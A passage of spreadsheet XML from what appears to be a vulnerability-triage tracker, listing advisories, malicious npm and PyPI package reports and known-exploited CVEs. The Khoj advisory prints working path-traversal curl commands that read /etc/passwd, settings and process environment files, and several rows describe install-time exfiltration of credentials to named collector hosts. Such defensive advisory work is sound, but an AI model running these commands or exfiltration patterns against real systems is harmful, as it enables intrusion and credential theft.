    ksmbd_iov_pin_rsp // fail
    status.ret = KSMBD_TREE_CONN_STATUS_NOMEM
    // do not disconnect tree_conn
Disconnect the new tree connection if ksmbd_iov_pin_rsp() fails.</t>
        </is>
      </c>
      <c r="T773" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98162</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B774" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C774" s="5" t="inlineStr">
        <is>
          <t>GHSA-29h2-jr22-frmh</t>
        </is>
      </c>
      <c r="D774" s="5" t="inlineStr"/>
      <c r="E774" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F774" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G774" s="5" t="inlineStr"/>
      <c r="H774" s="5" t="inlineStr"/>
      <c r="I774" s="5" t="inlineStr"/>
      <c r="J774" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K774" s="5" t="inlineStr"/>
      <c r="L774" s="5" t="inlineStr">
        <is>
          <t>npm:@openzeppelin/confidential-contracts</t>
        </is>
      </c>
      <c r="M774" s="5" t="inlineStr">
        <is>
          <t>0.3.2, 0.4.2, 0.5.2</t>
        </is>
      </c>
      <c r="N774" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O774" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P774" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q774" s="5" t="inlineStr"/>
      <c r="R774" s="5" t="inlineStr"/>
      <c r="S774" s="5" t="inlineStr">
        <is>
          <t>### Impact
Two locations consume an encrypted handle returned by an untrusted external party and use it without verifying that the party is ACL-authorized on it.
#### `VestingWalletConfidential`
Malicious users can call `release` with a malicious token. This token could return an alternative handle on `confidentialBalanceOf`, which represents the balance of the vesting wallet on an alternative ERC-7984 token (or any other handle that the vesting wallet has access to). The vesting wallet does not check that the token has ACL access and grants access to a new handle derived from the returned handle.
Effectively, this bug allows a malicious user to gain information about any private `euint64` handle that the vesting wallet has access to via a malicious ERC-7984 token. There is no loss of funds.
#### ERC7984
On a transfer with callback, `ERC7984` uses the `ebool` returned by the
recipient's `IERC7984Receiver.onConfidentialTransferReceived` to drive the refund
logic, without checking that the recipient has ACL access to it. A malicious recipient
can return any `ebool` the token has access to and recover its plaintext from the
refund result, which the token grants the caller access to. The leak is limited
to `ebool` handles (the value is only used as an `FHE.select` condition), and
there is no loss of funds.
### Patches
Both issues were fixed in the same patch releases: v0.5.2, v0.4.2, v0.3.2
- `VestingWalletConfidential`: 93e75ceed2b9648f53f9d133f431064353456805 (#423).
- `ERC7984` transfer callback: fe0863af2c9dce7614acce98720a913bf6a767a5 (#428), with follow-up ee47edf189ab681cebdad18bfb53dee541987be2 (#431) permitting an uninitialized returned handle.</t>
        </is>
      </c>
      <c r="T774" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-29h2-jr22-frmh</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B775" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C775" s="5" t="inlineStr">
        <is>
          <t>GHSA-62mm-xwmv-crhg</t>
        </is>
      </c>
      <c r="D775" s="5" t="inlineStr"/>
      <c r="E775" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F775" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G775" s="5" t="inlineStr"/>
      <c r="H775" s="5" t="inlineStr"/>
      <c r="I775" s="5" t="inlineStr"/>
      <c r="J775" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K775" s="5" t="inlineStr"/>
      <c r="L775" s="5" t="inlineStr">
        <is>
          <t>PyPI:khoj</t>
        </is>
      </c>
      <c r="M775" s="5" t="inlineStr">
        <is>
          <t>2.0.0-beta.25</t>
        </is>
      </c>
      <c r="N775" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O775" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P775" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q775" s="5" t="inlineStr"/>
      <c r="R775" s="5" t="inlineStr"/>
      <c r="S775" s="5" t="inlineStr">
        <is>
          <t>### Summary
The `/home/{file_path:path}` endpoint in `web_client.py` serves static files by directly concatenating the user-supplied `file_path` with the `home_directory` constant. There is no path traversal filtering, no path normalization check, and no authentication required. An attacker can use `../` sequences to read arbitrary files from the server filesystem.
### Details
**Vulnerable code** — `src/khoj/routers/web_client.py` lines 46-49:
```python
@web_client.get("/home/{file_path:path}", response_class=FileResponse)
def home_static_files(file_path: str):
    """Serve static files from the home landing page directory"""
    return FileResponse(constants.home_directory / file_path)
```
Where `home_directory` is defined in `src/khoj/utils/constants.py` line 6:
```python
home_directory = web_directory / "home/"
```
**What is missing:**
- No `..` traversal filtering
- No path normalization/resolution check (e.g., `resolved.is_relative_to(home_directory)`)
- No authentication decorator (`@requires(["authenticated"])` is absent)
- Starlette's `FileResponse` does NOT perform path traversal protection
**Path resolution:**
```
Request: GET /home/../../../../../../../etc/passwd
file_path = "../../../../../../../etc/passwd"
home_directory / file_path = /app/src/khoj/interface/web/home/../../../../../../../etc/passwd
OS resolves to: /etc/passwd
```
### PoC
```bash
# Read /etc/passwd (no authentication required)
curl http://localhost:42110/home/../../../../../../../etc/passwd
# Read application settings (may contain SECRET_KEY, DB credentials)
curl http://localhost:42110/home/../../../../settings.py
# Read environment file
curl http://localhost:42110/home/../../../../../../../proc/self/environ
```
URL-encoded variant (may bypass some reverse proxy normalization):
```bash
curl http://localhost:42110/home/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
```
### Impact
Unauthenticated arbitrary file read. An attacker with network access to the Khoj instance can:
- **Read application configuration** — Django `SECRET_KEY`, database credentials, API keys
- **Read system files** — `/etc/passwd`, `/etc/shadow` (if permissions allow), `/proc/self/environ`
- **Exfiltrate sensitive data** — Any file readable by the server process
- **Facilitate further attacks** — Leaked credentials enable deeper compromise
**No authentication required** — the endpoint has no auth decorators, making it exploitable by any network-reachable attacker.
### Recommended fix
Use FastAPI's built-in `StaticFiles` mount instead of a custom handler, or add explicit path validation:
```python
@web_client.get("/home/{file_path:path}", response_class=FileResponse)
def home_static_files(file_path: str):
    resolved = (constants.home_directory / file_path).resolve()
    if not resolved.is_relative_to(constants.home_directory.resolve()):
        raise HTTPException(status_code=404)
    return FileResponse(resolved)
```</t>
        </is>
      </c>
      <c r="T775" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-62mm-xwmv-crhg</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B776" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C776" s="5" t="inlineStr">
        <is>
          <t>GHSA-7qx8-98q7-66p4</t>
        </is>
      </c>
      <c r="D776" s="5" t="inlineStr"/>
      <c r="E776" s="5" t="inlineStr"/>
      <c r="F776" s="5" t="inlineStr"/>
      <c r="G776" s="5" t="inlineStr"/>
      <c r="H776" s="5" t="inlineStr"/>
      <c r="I776" s="5" t="inlineStr"/>
      <c r="J776" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K776" s="5" t="inlineStr"/>
      <c r="L776" s="5" t="inlineStr">
        <is>
          <t>npm:@nubjs/types</t>
        </is>
      </c>
      <c r="M776" s="5" t="inlineStr"/>
      <c r="N776" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O776" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P776" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q776" s="5" t="inlineStr"/>
      <c r="R776" s="5" t="inlineStr"/>
      <c r="S776" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (1b292cfe4598353bc8491677099fd2c056f4136eb686345bbdbe68fa887e368c)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776" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17186</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B777" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C777" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17181</t>
        </is>
      </c>
      <c r="D777" s="5" t="inlineStr"/>
      <c r="E777" s="5" t="inlineStr"/>
      <c r="F777" s="5" t="inlineStr"/>
      <c r="G777" s="5" t="inlineStr"/>
      <c r="H777" s="5" t="inlineStr"/>
      <c r="I777" s="5" t="inlineStr"/>
      <c r="J777" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K777" s="5" t="inlineStr"/>
      <c r="L777" s="5" t="inlineStr">
        <is>
          <t>PyPI:reqparser</t>
        </is>
      </c>
      <c r="M777" s="5" t="inlineStr"/>
      <c r="N777" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O777" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P777" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q777" s="5" t="inlineStr"/>
      <c r="R777" s="5" t="inlineStr"/>
      <c r="S777" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (982923c14e644e82a839621d37715fd123568fc378aed45b6afa6247bc0b5054)
During the module import, the package starts an infostealer. It exfiltrates data from crypto currency wallets and web browsers, ensures persistence and installs further malware.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-reqparser
Reasons (based on the campaign):
 - malware
 - persistence
 - exfiltration-crypto
 - exfiltration-browser-data
 - The package contains code to detect if it is running in a sandbox environment.
 - infostealer
 - keylogger
</t>
        </is>
      </c>
      <c r="T777" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17181</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B778" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C778" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17182</t>
        </is>
      </c>
      <c r="D778" s="5" t="inlineStr"/>
      <c r="E778" s="5" t="inlineStr"/>
      <c r="F778" s="5" t="inlineStr"/>
      <c r="G778" s="5" t="inlineStr"/>
      <c r="H778" s="5" t="inlineStr"/>
      <c r="I778" s="5" t="inlineStr"/>
      <c r="J778" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K778" s="5" t="inlineStr"/>
      <c r="L778" s="5" t="inlineStr">
        <is>
          <t>npm:app-sca-info-banking</t>
        </is>
      </c>
      <c r="M778" s="5" t="inlineStr"/>
      <c r="N778" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O778" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P778" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q778" s="5" t="inlineStr"/>
      <c r="R778" s="5" t="inlineStr"/>
      <c r="S778" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9733b1d7500efca385ba6dc866f4ef1b04e0d1cd4ead564b9445551a2d72a51b)
package.json declares scripts.postinstall: `node poc.js`, causing poc.js to execute automatically on npm install. poc.js issues DNS (dns.resolve4) and HTTP (http.get) callbacks to unique subdomains under ki6rmdjnq5q8y7v8soxc080fz65ytohd.oastify.com (a Burp Suite Collaborator / OAST host) and writes a marker file under os.tmpdir(). The package's main entry is an empty stub (module.exports = {}); the postinstall payload is the package's only functionality. The DNS/HTTP callbacks to an attacker-controlled OAST domain confirm arbitrary code execution on the installer's host and leak install-event metadata to a third-party endpoint.
## Source: ossf-package-analysis (3f5e6f43a1552d09c016e2db6c287a1972a70df70fa7a42d3049840d04580bd4)
The OpenSSF Package Analysis project identified 'app-sca-info-banking' @ 0.0.24 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
</t>
        </is>
      </c>
      <c r="T778" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17182</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B779" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C779" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17183</t>
        </is>
      </c>
      <c r="D779" s="5" t="inlineStr"/>
      <c r="E779" s="5" t="inlineStr"/>
      <c r="F779" s="5" t="inlineStr"/>
      <c r="G779" s="5" t="inlineStr"/>
      <c r="H779" s="5" t="inlineStr"/>
      <c r="I779" s="5" t="inlineStr"/>
      <c r="J779" s="5" t="inlineStr">
        <is>
          <t>pypi, go</t>
        </is>
      </c>
      <c r="K779" s="5" t="inlineStr"/>
      <c r="L779" s="5" t="inlineStr">
        <is>
          <t>PyPI:tego-managed-agents-test</t>
        </is>
      </c>
      <c r="M779" s="5" t="inlineStr"/>
      <c r="N779" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O779" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P779" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q779" s="5" t="inlineStr"/>
      <c r="R779" s="5" t="inlineStr"/>
      <c r="S779" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (72c8a01de8d706d83a4b80b845099c11602ba778a392337cad2d9a8a40090b5d)
The package's custom install command serializes the entire process environment (dict(os.environ)) to JSON and POSTs it to the hardcoded endpoint https://gateway.tego.security during `pip install`. The exfiltration runs automatically as part of the install lifecycle without user consent, and exceptions are silently swallowed so no error is surfaced to the installer. Because process environments on developer and CI hosts routinely contain credentials (AWS_ACCESS_KEY_ID/AWS_SECRET_ACCESS_KEY, GITHUB_TOKEN, NPM_TOKEN, database passwords, and other secret-shaped variables), this indiscriminate bulk-environment upload is a credential-harvesting exfiltration path from installer to a remote author-controlled host.
## Source: kam193 (b09488c67894dd74d043a240308c694f0e42464e3a4f371b8d5ebc8a6a589d7b)
During installation, the code exfiltrates all environment variables to a remote location.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-tego-managed-agents-test
Reasons (based on the campaign):
 - exfiltration-env-variables
 - The package overrides the install command in setup.py to execute malicious code during installation.
</t>
        </is>
      </c>
      <c r="T779" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17183</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B780" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C780" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17184</t>
        </is>
      </c>
      <c r="D780" s="5" t="inlineStr"/>
      <c r="E780" s="5" t="inlineStr"/>
      <c r="F780" s="5" t="inlineStr"/>
      <c r="G780" s="5" t="inlineStr"/>
      <c r="H780" s="5" t="inlineStr"/>
      <c r="I780" s="5" t="inlineStr"/>
      <c r="J780" s="5" t="inlineStr">
        <is>
          <t>npm, typescript</t>
        </is>
      </c>
      <c r="K780" s="5" t="inlineStr"/>
      <c r="L780" s="5" t="inlineStr">
        <is>
          <t>npm:@airbnb-extended/typescript-config</t>
        </is>
      </c>
      <c r="M780" s="5" t="inlineStr"/>
      <c r="N780" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O780" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P780" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q780" s="5" t="inlineStr"/>
      <c r="R780" s="5" t="inlineStr"/>
      <c r="S780" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8424e4bf8731b950511535a2cb9b41b0bedba02092a73ea304b6730f04aa95fe)
package.json for @airbnb-extended/typescript-config@99.9.1 declares a dependency `ltidisafe` sourced from a bare HTTPS tarball URL (https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.7.8.tgz) instead of a registry version range. On `npm install`, npm fetches and installs whatever bytes that URL returns, executing any lifecycle scripts inside the fetched tarball. The source is unpinned by integrity hash, is not the npm registry, and is unrelated to any Airbnb-published infrastructure. The scope/name also mimics the well-known `@airbnb/typescript-config` package, and the version `99.9.1` is implausibly high — a dependency-confusion / lure shape designed to win resolution against a legitimate internal or public package. The tarball URL is mutable by whoever controls the storage bucket, so the delivered payload can change at any time.
</t>
        </is>
      </c>
      <c r="T780" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17184</t>
        </is>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B781" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C781" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17185</t>
        </is>
      </c>
      <c r="D781" s="5" t="inlineStr"/>
      <c r="E781" s="5" t="inlineStr"/>
      <c r="F781" s="5" t="inlineStr"/>
      <c r="G781" s="5" t="inlineStr"/>
      <c r="H781" s="5" t="inlineStr"/>
      <c r="I781" s="5" t="inlineStr"/>
      <c r="J781" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K781" s="5" t="inlineStr"/>
      <c r="L781" s="5" t="inlineStr">
        <is>
          <t>npm:shoplist-app</t>
        </is>
      </c>
      <c r="M781" s="5" t="inlineStr"/>
      <c r="N781" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O781" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P781" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q781" s="5" t="inlineStr"/>
      <c r="R781" s="5" t="inlineStr"/>
      <c r="S781" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (fdceadb01f08162934382b121e813236b86adc0d4d74b7b2f062c78e529c34f6)
shoplist-app@99.99.99 is a dependency-confusion / typosquat beacon. preinstall.js is wired into every lifecycle hook (preinstall, install, postinstall, prepare, prepublish) and issues an HTTPS GET to the hardcoded endpoint https://eo8f3m3ho26a0nm.m.pipedream.net/, transmitting the installer's machine hostname via os.hostname() (smuggled into a `host` HTTP header) together with package identity in the query string. index.js — the package `main` — independently fires a second HTTPS GET to the same Pipedream collector at require/import time, carrying os.platform() and a `trigger=runtime` marker. The package ships no functional code beyond these beacons; its version (99.99.99) and description ("test") are consistent with a name-squat probe designed to identify which internal build hosts resolve the name shoplist-app. The exfiltrated data (hostname, OS platform, package-name confirmation) gives the operator of the Pipedream endpoint a map of environments where a shoplist-app dependency reference successfully resolves to this public package — the standard reconnaissance stage of a dependency-confusion attack.
</t>
        </is>
      </c>
      <c r="T781" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17185</t>
        </is>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B782" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C782" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17187</t>
        </is>
      </c>
      <c r="D782" s="5" t="inlineStr"/>
      <c r="E782" s="5" t="inlineStr"/>
      <c r="F782" s="5" t="inlineStr"/>
      <c r="G782" s="5" t="inlineStr"/>
      <c r="H782" s="5" t="inlineStr"/>
      <c r="I782" s="5" t="inlineStr"/>
      <c r="J782" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K782" s="5" t="inlineStr"/>
      <c r="L782" s="5" t="inlineStr">
        <is>
          <t>npm:@digift/cli</t>
        </is>
      </c>
      <c r="M782" s="5" t="inlineStr"/>
      <c r="N782" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O782" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P782" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q782" s="5" t="inlineStr"/>
      <c r="R782" s="5" t="inlineStr"/>
      <c r="S782" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ossf-package-analysis (5508ba462afd4a4d6f311cca1a00d728ea27b8fe03a2fba93878a9fabbb7f309)
The OpenSSF Package Analysis project identified '@digift/cli' @ 99.99.100 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
</t>
        </is>
      </c>
      <c r="T782" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17187</t>
        </is>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B783" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C783" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17188</t>
        </is>
      </c>
      <c r="D783" s="5" t="inlineStr"/>
      <c r="E783" s="5" t="inlineStr"/>
      <c r="F783" s="5" t="inlineStr"/>
      <c r="G783" s="5" t="inlineStr"/>
      <c r="H783" s="5" t="inlineStr"/>
      <c r="I783" s="5" t="inlineStr"/>
      <c r="J783" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K783" s="5" t="inlineStr"/>
      <c r="L783" s="5" t="inlineStr">
        <is>
          <t>PyPI:sherpy</t>
        </is>
      </c>
      <c r="M783" s="5" t="inlineStr"/>
      <c r="N783" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O783" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P783" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q783" s="5" t="inlineStr"/>
      <c r="R783" s="5" t="inlineStr"/>
      <c r="S783" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (2e5440f1e24545fd14e73c7fc459a9abf893f4674683899ed29ff7c4189416b6)
When used, the package exfiltrates Chrome extension files (likely targeting cryptocurrency wallets) and sensitive Telegram files.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-sherpy
Reasons (based on the campaign):
 - infostealer
 - exfiltration-crypto
 - target:telegram
 - native-extension
</t>
        </is>
      </c>
      <c r="T783" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17188</t>
        </is>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B784" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C784" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87902</t>
        </is>
      </c>
      <c r="D784" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E784" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F784" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G784" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H784" s="5" t="n">
        <v>0.029</v>
      </c>
      <c r="I784" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J784" s="5" t="inlineStr"/>
      <c r="K784" s="5" t="inlineStr">
        <is>
          <t>wordpress:core</t>
        </is>
      </c>
      <c r="L784" s="5" t="inlineStr"/>
      <c r="M784" s="5" t="inlineStr"/>
      <c r="N784" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O784" s="5" t="inlineStr"/>
      <c r="P784" s="5" t="inlineStr"/>
      <c r="Q784" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="R784" s="5" t="inlineStr"/>
      <c r="S784" s="5" t="inlineStr">
        <is>
          <t>WordPress Core contains a remote file inclusion vulnerability which could allow an unauthenticated attacker to make page-template resolution include a chosen readable local `.php` file outside the active theme directories, leading to remote code execution.</t>
        </is>
      </c>
      <c r="T784" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87902</t>
        </is>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B785" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C785" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65660</t>
        </is>
      </c>
      <c r="D785" s="5" t="inlineStr"/>
      <c r="E785" s="5" t="inlineStr"/>
      <c r="F785" s="5" t="inlineStr"/>
      <c r="G785" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H785" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I785" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J785" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K785" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="L785" s="5" t="inlineStr"/>
      <c r="M785" s="5" t="inlineStr"/>
      <c r="N785" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O785" s="5" t="inlineStr"/>
      <c r="P785" s="5" t="inlineStr"/>
      <c r="Q785" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="R785" s="5" t="inlineStr"/>
      <c r="S785" s="5" t="inlineStr">
        <is>
          <t>Microsoft SharePoint contains a code injection vulnerability which could allow an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T785" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65660</t>
        </is>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B786" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C786" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67279</t>
        </is>
      </c>
      <c r="D786" s="5" t="inlineStr"/>
      <c r="E786" s="5" t="inlineStr"/>
      <c r="F786" s="5" t="inlineStr"/>
      <c r="G786" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H786" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I786" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J786" s="5" t="inlineStr"/>
      <c r="K786" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L786" s="5" t="inlineStr"/>
      <c r="M786" s="5" t="inlineStr"/>
      <c r="N786" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O786" s="5" t="inlineStr"/>
      <c r="P786" s="5" t="inlineStr"/>
      <c r="Q786" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="R786" s="5" t="inlineStr"/>
      <c r="S786" s="5" t="inlineStr">
        <is>
          <t>Mikrotik RouterOS contains an improper enforcement of behavioral workflow vulnerability that could allow an unauthenticated client to open a session channel and send an exec request. This vulnerability can be chained to achieve unauthenticated exploitation of CVE-2026-86060.</t>
        </is>
      </c>
      <c r="T786" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67279</t>
        </is>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B787" s="5" t="inlineStr">
